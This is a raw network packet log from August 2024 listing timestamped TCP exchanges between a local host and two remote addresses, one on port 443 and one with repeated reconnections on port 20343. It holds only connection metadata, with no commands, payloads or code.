Aug 8, 2024 02:36:15.449425936 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:15.449441910 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:15.982836962 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:15.984535933 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:15.988408089 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:15.988418102 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:15.989226103 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:15.989800930 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:15.990751028 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.036498070 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.355235100 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.355287075 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.355304956 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.355392933 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.355398893 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.355501890 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.355505943 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.355571032 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.355576038 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.355639935 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.355644941 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.355669975 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.355716944 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.355716944 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.355755091 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.355799913 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.355838060 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.355911970 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.355926991 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.356018066 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.356021881 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.356097937 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.356132984 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.356194973 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.446018934 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.446160078 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.446167946 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.446228027 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.446252108 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.446257114 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.446291924 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.446305990 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.473778963 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.473942995 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.473957062 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.473987103 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.474034071 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.474034071 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.474065065 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.474162102 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.474167109 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.474268913 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.474271059 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.474292040 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.474333048 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.474333048 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.474904060 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.474968910 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.474982977 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.475053072 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.475431919 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.475492001 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.475518942 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.475593090 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.475604057 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.475653887 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.476259947 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.476346970 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.476351976 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.476423979 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.476428986 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.476516008 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.476520061 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.476571083 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.477109909 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.477166891 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.537611961 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.537733078 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.537736893 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.537815094 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.537817001 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.537842989 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.537959099 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.537965059 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.538038969 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.538043022 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.538079977 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.590831995 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.590970993 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.590976000 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.591033936 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.591043949 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.591183901 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.591185093 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.591212034 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.591269970 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.591269970 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.591298103 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.591389894 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.591398001 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.591419935 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.591465950 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.591465950 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.591515064 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.591584921 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.591598034 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.591660023 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.591717958 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.591818094 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.591836929 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.591841936 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.591872931 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.591872931 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.591911077 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.591981888 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.591998100 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.592101097 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.592147112 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.592150927 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.592195988 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.592226028 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.592226028 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.592232943 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.592279911 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.592279911 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.629002094 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.629129887 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.629134893 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.629179001 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.629201889 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.629205942 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.629257917 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.629257917 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.629281998 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.629376888 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.629426956 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.629435062 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.629472971 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.629472971 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.658179998 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.658397913 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.670892000 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.671112061 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.671117067 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:16.671217918 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.671217918 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.716521978 CEST	49731	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:36:16.722326040 CEST	20343	49731	147.185.221.16	192.168.2.4
Aug 8, 2024 02:36:16.973614931 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:16.973644018 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:23.443253994 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:23.443296909 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:23.443366051 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:23.452857018 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:23.452879906 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:23.923476934 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:23.923572063 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:23.929085016 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:23.929099083 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:23.929868937 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:23.930953026 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:23.932265043 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:23.976499081 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.326229095 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.326340914 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.326436996 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.326483011 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.326498032 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.326541901 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.326548100 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.326637983 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.326725960 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.326772928 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.326772928 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.326781034 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.326849937 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.326919079 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.326920033 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.326950073 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.326973915 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.326973915 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.326992989 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.327070951 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.328659058 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.412627935 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.412693977 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.412765026 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.412812948 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.412852049 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.412908077 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.412920952 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.412955046 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.446285963 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.446362019 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.446382999 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.446496964 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.446504116 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.446563959 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.446572065 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.446654081 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.446656942 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.446681976 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.446732044 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.446732044 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.446787119 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.446849108 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.446865082 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.446976900 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.446984053 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.447067022 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.447073936 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.447125912 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.447674036 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.447736979 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.447741985 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.447776079 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.447810888 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.447810888 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.447818041 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.447873116 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.447880030 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.447959900 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.448256016 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.448302031 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.448314905 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.448368073 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.448371887 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.448424101 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.448430061 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.448510885 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.448999882 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.449126005 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.500478983 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.500572920 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.500606060 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.500737906 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.500747919 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.500824928 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.500825882 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.500852108 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.500910997 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.500910997 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.500931025 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.501085997 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.533654928 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.533724070 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.579476118 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.579571962 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.579591036 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.579678059 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.580095053 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.580176115 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.580183029 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.580282927 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.580878019 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.580944061 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.581470013 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.581531048 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.581558943 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.581821918 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.582256079 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.582309008 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.583092928 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.583162069 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.583204985 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.583255053 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.587337017 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.587424994 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.587475061 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.587481976 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.587523937 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.587523937 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.587960958 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.588017941 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.588047981 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.588145018 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.621376991 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.621500015 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.621505022 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.621537924 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:24.621577024 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.621577024 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.621613979 CEST	49739	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:24.621632099 CEST	443	49739	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:26.755485058 CEST	49731	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:36:26.760746956 CEST	20343	49731	147.185.221.16	192.168.2.4
Aug 8, 2024 02:36:27.601955891 CEST	20343	49731	147.185.221.16	192.168.2.4
Aug 8, 2024 02:36:27.602051973 CEST	49731	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:36:30.989034891 CEST	49731	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:36:30.990709066 CEST	49740	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:36:30.994544983 CEST	20343	49731	147.185.221.16	192.168.2.4
Aug 8, 2024 02:36:30.996361971 CEST	20343	49740	147.185.221.16	192.168.2.4
Aug 8, 2024 02:36:30.996459007 CEST	49740	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:36:31.026499033 CEST	49740	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:36:31.032362938 CEST	20343	49740	147.185.221.16	192.168.2.4
Aug 8, 2024 02:36:44.411330938 CEST	49740	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:36:44.416395903 CEST	20343	49740	147.185.221.16	192.168.2.4
Aug 8, 2024 02:36:52.383972883 CEST	20343	49740	147.185.221.16	192.168.2.4
Aug 8, 2024 02:36:52.384149075 CEST	49740	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:36:53.755251884 CEST	49740	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:36:53.757356882 CEST	49741	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:36:53.760410070 CEST	20343	49740	147.185.221.16	192.168.2.4
Aug 8, 2024 02:36:53.762813091 CEST	20343	49741	147.185.221.16	192.168.2.4
Aug 8, 2024 02:36:53.763020992 CEST	49741	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:36:53.805351973 CEST	49741	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:36:53.810736895 CEST	20343	49741	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:07.020849943 CEST	49741	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:07.333005905 CEST	49741	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:07.524631023 CEST	20343	49741	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:07.526546001 CEST	20343	49741	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:10.458077908 CEST	49741	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:10.464673042 CEST	20343	49741	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:11.427078962 CEST	49741	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:11.432766914 CEST	20343	49741	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:12.303143024 CEST	49741	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:12.312433004 CEST	20343	49741	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:13.583539963 CEST	49741	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:13.589796066 CEST	20343	49741	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:13.801913023 CEST	49741	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:13.807581902 CEST	20343	49741	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:13.928436995 CEST	49741	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:13.933806896 CEST	20343	49741	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:13.989367008 CEST	49741	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:13.995143890 CEST	20343	49741	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:15.181395054 CEST	20343	49741	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:15.181684017 CEST	49741	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:19.006165981 CEST	49741	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:19.009916067 CEST	49743	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:19.011718988 CEST	20343	49741	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:19.015382051 CEST	20343	49743	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:19.015631914 CEST	49743	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:19.109487057 CEST	49743	20343	192.168.2.4	147.185.221.16
